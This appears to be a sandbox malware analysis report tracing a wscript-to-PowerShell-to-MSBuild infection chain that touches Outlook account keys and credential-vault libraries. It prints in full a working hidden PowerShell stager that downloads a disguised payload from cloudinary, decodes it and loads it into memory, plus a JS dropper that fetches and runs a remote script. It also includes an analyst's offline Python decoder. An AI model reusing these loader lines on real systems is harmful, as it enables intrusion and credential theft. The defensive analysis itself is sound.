                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.exe C:\Windows\Temp\???2????4????4????5.js", "0", "true");IServerXMLHTTPRequest2.open("GET", "https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Windows\Temp\???2????4????4????5.js", "2");_Stream.Close();IWshShell3.Run("wscript.exe C:\Windows\Temp\???2????4????4????5.js", "0", "true");IFileSystem3.FileExists("C:\Windows\Temp\???2????4????4????5.js");IFileSystem3.DeleteFile("C:\Windows\Temp\???2????4????4????5.js")
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQA", "0", "true")
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $forsakers = '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
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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 to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
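The PowerShell command line above fetches a file served under an image path, decodes the whole download as UTF-8, cuts the text between <<BASE64_START>> and <<BASE64_END>>, reverses it character by character, base64-decodes it and passes the bytes to Assembly.Load; the first argument it then hands to dnlib.IO.Home.VAI is a URL written backwards. The Python below is an added example, not code from the report or from the sample, that replays that extraction offline so an analyst can pull the embedded payload out of the download without executing the stager. The download itself is not reproduced here; the example runs on a constructed stand-in. Reading the fifth VAI argument as the name of the process spawned next is an assumption drawn from the MSBuild.exe launch that follows in the process tree.

```python
import base64

# Marker strings copied from the stager's command line in the report.
START_MARKER = "<<BASE64_START>>"
END_MARKER = "<<BASE64_END>>"


def reverse_string(s: str) -> str:
    """Undo the character-order reversal the stager applies to both the
    base64 text and the first VAI argument (the PowerShell does it with
    ToCharArray() and the index range [-1..-Length])."""
    return s[::-1]


def extract_payload(downloaded: bytes) -> bytes:
    """Replay the stager's extraction: decode the whole download as UTF-8,
    cut the text between the markers, reverse it, base64-decode it.

    The stager calls UTF8.GetString on the full download, so any image
    bytes that are not valid UTF-8 turn into U+FFFD; errors="replace" does
    the same here and leaves the ASCII markers and base64 text intact.
    Unlike the stager, which only evaluates its marker check and then
    calls Substring regardless, this raises when the markers are missing.
    """
    text = downloaded.decode("utf-8", errors="replace")
    start = text.find(START_MARKER)
    end = text.find(END_MARKER)
    if start < 0 or end <= start:
        raise ValueError("payload markers not found or out of order")
    start += len(START_MARKER)
    reversed_b64 = "".join(text[start:end].split())  # FromBase64String ignores whitespace
    return base64.b64decode(reverse_string(reversed_b64), validate=True)


def looks_like_pe(data: bytes) -> bool:
    """The decoded bytes go straight to Assembly.Load, so a real payload
    is a PE file; a missing MZ header means the extraction went wrong."""
    return data[:2] == b"MZ"


def decode_vai_args(args):
    """Interpret the array passed to dnlib.IO.Home.VAI as far as the report
    supports it: args[0] is a URL written backwards. Treating args[4] as the
    name of the process spawned next is an assumption based on the
    MSBuild.exe launch in the process tree; the other positions are
    returned untouched."""
    return {
        "c2_url": reverse_string(args[0]),
        "target_process_hint": args[4],
        "other_args": list(args[1:4]) + list(args[5:]),
    }


# Constructed stand-in for the downloaded "image": JPEG-looking bytes around
# the reversed base64 of a fake payload. Neither is the real download.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 58 + b"PE\x00\x00" + b"constructed, not a real assembly"
_B64 = base64.b64encode(SAMPLE_PAYLOAD).decode("ascii")
SAMPLE_DOWNLOAD = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x80\xff" * 8
    + START_MARKER.encode("ascii")
    + reverse_string(_B64).encode("ascii")
    + END_MARKER.encode("ascii")
    + b"\xff\xd9"
)

# Argument array exactly as it appears in the report's command line.
VAI_ARGS = [
    "0/tBcDi/r/ee.etsap//:sptth", "constantan", "constantan", "constantan",
    "MSBuild", "constantan", "constantan", "constantan", "constantan",
    "constantan", "constantan", "constantan", "1", "constantan",
]

if __name__ == "__main__":
    payload = extract_payload(SAMPLE_DOWNLOAD)
    print("payload bytes:", len(payload), "PE header:", looks_like_pe(payload))
    print("VAI arguments:", decode_vai_args(VAI_ARGS))
```

Against a real capture, feed the raw bytes of the file fetched from the cloudinary URL to extract_payload and check looks_like_pe before loading the result into a .NET disassembler; the decoded assembly, not the stager, is what carries the injection into MSBuild.exe.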
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_004567E0 push eax; ret 10_2_004567FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0045B9DD push esi; ret 10_2_0045B9E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00455EAF push ecx; ret 10_2_00455EC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00433FF6 push ecx; ret 10_2_00434009
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_10002806 push ecx; ret 10_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00451D34 push eax; ret 12_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00414060 push eax; ret 13_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00414060 push eax; ret 13_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00414039 push ecx; ret 13_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00406128 ShellExecuteW,URLDownloadToFileW,10_2_00406128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00419BC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0040E54F Sleep,ExitProcess,10_2_0040E54F
